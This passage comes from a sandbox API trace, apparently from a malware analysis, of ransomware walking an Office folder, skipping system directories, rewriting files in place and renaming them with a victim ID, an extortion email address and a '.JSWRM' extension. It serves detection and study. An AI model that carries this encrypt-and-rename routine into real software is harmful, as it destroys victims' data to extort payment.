lpUsedDefaultChar=0x0) returned 5 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir11f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.038] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5894) returned 1 [0120.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1700) returned 0x24e1d8 [0120.038] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1700, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1700, lpOverlapped=0x0) returned 1 [0120.040] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.040] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1700, lpOverlapped=0x0) returned 1 [0120.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.040] CloseHandle (hObject=0x314) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0120.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0120.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir11f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR11F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir11f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0120.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.042] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6499, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR12F.GIF", cAlternateFileName="")) returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2=".") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="..") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="...") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="windows") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="recovery") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="perflogs") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="documents and settings") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="system volume information") returned 1 [0120.042] lstrcmpiW (lpString1="ZPDIR12F.GIF", lpString2="msocache") returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0120.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR12F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR12F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR12F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0120.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR12F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR12F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR12F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir12f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.044] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=25753) returned 1 [0120.044] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6490) returned 0x24e1d8 [0120.044] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x6490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x6490, lpOverlapped=0x0) returned 1 [0120.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.049] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x6490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x6490, lpOverlapped=0x0) returned 1 [0120.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.049] CloseHandle (hObject=0x314) returned 1 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0120.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0120.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir12f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR12F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir12f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0120.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.050] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ce8, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR13F.GIF", cAlternateFileName="")) returned 1 [0120.050] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2=".") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="..") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="...") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="windows") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="recovery") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="perflogs") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="documents and settings") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="system volume information") returned 1 [0120.051] lstrcmpiW (lpString1="ZPDIR13F.GIF", lpString2="msocache") returned 1 [0120.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR13F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR13F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR13F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0120.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR13F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR13F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR13F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir13f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.052] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15592) returned 1 [0120.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ce0) returned 0x24e1d8 [0120.052] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3ce0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3ce0, lpOverlapped=0x0) returned 1 [0120.056] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.056] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3ce0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3ce0, lpOverlapped=0x0) returned 1 [0120.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.056] CloseHandle (hObject=0x314) returned 1 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0120.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0120.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.056] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir13f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR13F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir13f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0120.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.057] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x645b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR14F.GIF", cAlternateFileName="")) returned 1 [0120.057] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2=".") returned 1 [0120.057] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="..") returned 1 [0120.057] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="...") returned 1 [0120.057] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="windows") returned 1 [0120.057] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="recovery") returned 1 [0120.058] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="perflogs") returned 1 [0120.058] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="documents and settings") returned 1 [0120.058] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.058] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="system volume information") returned 1 [0120.058] lstrcmpiW (lpString1="ZPDIR14F.GIF", lpString2="msocache") returned 1 [0120.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR14F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR14F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR14F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0120.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR14F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR14F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR14F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0120.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir14f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.059] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=25691) returned 1 [0120.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6450) returned 0x24e1d8 [0120.059] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x6450, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x6450, lpOverlapped=0x0) returned 1 [0120.062] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.062] WriteFile (in: 